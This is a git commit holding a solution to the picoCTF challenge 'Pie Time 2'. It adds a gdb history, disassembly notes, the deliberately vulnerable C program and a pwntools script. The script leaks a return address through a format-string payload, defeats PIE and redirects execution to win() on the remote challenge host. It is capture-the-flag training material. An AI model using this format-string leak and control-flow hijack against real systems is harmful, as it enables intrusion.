Pie Time 2

2025-12-04 11:53:31 +01:00
parent 18d2c8c2be
commit a3a7081d42
5 changed files with 232 additions and 0 deletions
--- a/pie_time_2/.gdb_history
+++ b/pie_time_2/.gdb_history
@@ -0,0 +1,122 @@
+r
+Quit
+r
+b *0
+r
+step
+step
+stepi
+next
+r
+nexti
+stepi
+break main
+r
+b
+clear 3
+clear
+exit
+break main
+r
+stepi
+stepi
+stepi
+nexti 
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+step
+exit
+b main
+r
+nexti
+stepi
+nexti
+stack-explore
+stackf
+hexdump 
+hexdump $sp
+hexdump $sp 128
+hexdump $sp 512
+ad40a7a0
+b main
+r
+stepi
+nexti
+r
+nexti
+step
+nexti
+stackf
+r
+nexti
+stepi
+nexti
+stackf
+r
+nexti
+stepi
+nexti
+stackf
+exit
+b call_functions 
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+stackf
+r
+nexti
+nexti
+stackf
+r
+nexti
+exit
+b call_functions+80
+b *call_functions+80
+r
+nexti
+stackf
+r
+nexti
+stackf
+55559311.f7e0a7a0.f7e0a7a0.55559328.0.340.f7e095c0.252e7825
+r
+exit
+b *call_functions+85
+r
+stackf
+55559311f7e0a7a0f7e0a7a0555593310340f7e095c078257825782578257825782578257825a980000
+r
+stackf
+55559311f7e0a7a0f7e0a7a0555593410340f7e095c0782578257825782578257825782578257825782578257825a0051675000ffffcff055555441ffffd090f7c27635f7fc2000ffffd118ffffd050
+r
+stackf
+r
+stackf
+r
+stackf
+exit
--- a/pie_time_2/notes.md
+++ b/pie_time_2/notes.md
@@ -0,0 +1,30 @@
+# find main layout with `objdump -d --disassemble=main vuln`
+```assembly
+0000000000001400 <main>:
+    1400:	f3 0f 1e fa          	endbr64
+    1404:	55                   	push   %rbp
+    1405:	48 89 e5             	mov    %rsp,%rbp
+    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9 <segfault_handler>
+    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
+    1414:	e8 57 fd ff ff       	call   1170 <signal@plt>
+    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010 <stdout@GLIBC_2.2.5>
+    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
+    1425:	ba 02 00 00 00       	mov    $0x2,%edx
+    142a:	be 00 00 00 00       	mov    $0x0,%esi
+    142f:	48 89 c7             	mov    %rax,%rdi
+    1432:	e8 49 fd ff ff       	call   1180 <setvbuf@plt>
+    1437:	b8 00 00 00 00       	mov    $0x0,%eax
+    143c:	e8 86 fe ff ff       	call   12c7 <call_functions>
+    1441:	b8 00 00 00 00       	mov    $0x0,%eax
+    1446:	5d                   	pop    %rbp
+    1447:	c3                   	ret
+```
+# find `main` and `win` locations
+```
+000000000000136a g     F .text	0000000000000096              win
+0000000000001400 g     F .text	0000000000000048              main
+```
+# find buffer offset to read return address into `main` via gdb
+- %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
+- return value $\leftrightarrow$ *main+65 after dot
+
--- a/pie_time_2/sol.py
+++ b/pie_time_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+from pwn import *
+
+#conn = process("./vuln")
+conn = remote('rescued-float.picoctf.net', 49587)
+conn.recvuntil(b'name:')
+conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
+conn.recvuntil(b'.')
+return_addr = int(conn.recvline(), 16)
+log.info(f"received return addr: {return_addr}")
+conn.recvuntil(b'12345: ')
+
+main_offset = 0x1400
+win_offset = 0x136a
+call_fun_ret_offset = 65
+
+main_addr = return_addr - call_fun_ret_offset
+win_offset = main_addr - main_offset + win_offset
+
+conn.sendline(f'{hex(win_offset)}'.encode())
+conn.recvline()
+conn.interactive()
+
--- a/pie_time_2/vuln
+++ b/pie_time_2/vuln
--- a/pie_time_2/vuln.c
+++ b/pie_time_2/vuln.c
@@ -0,0 +1,56 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <unistd.h>
+
+void segfault_handler() {
+  printf("Segfault Occurred, incorrect address.\n");
+  exit(0);
+}
+
+void call_functions() {
+  char buffer[64];
+  printf("Enter your name:");
+  fgets(buffer, 64, stdin);
+  printf(buffer);
+
+  unsigned long val;
+  printf(" enter the address to jump to, ex => 0x12345: ");
+  scanf("%lx", &val);
+
+  void (*foo)(void) = (void (*)())val;
+  foo();
+}
+
+int win() {
+  FILE *fptr;
+  char c;
+
+  printf("You won!\n");
+  // Open file
+  fptr = fopen("flag.txt", "r");
+  if (fptr == NULL)
+  {
+      printf("Cannot open file.\n");
+      exit(0);
+  }
+
+  // Read contents from file
+  c = fgetc(fptr);
+  while (c != EOF)
+  {
+      printf ("%c", c);
+      c = fgetc(fptr);
+  }
+
+  printf("\n");
+  fclose(fptr);
+}
+
+int main() {
+  signal(SIGSEGV, segfault_handler);
+  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+  call_functions();
+  return 0;
+}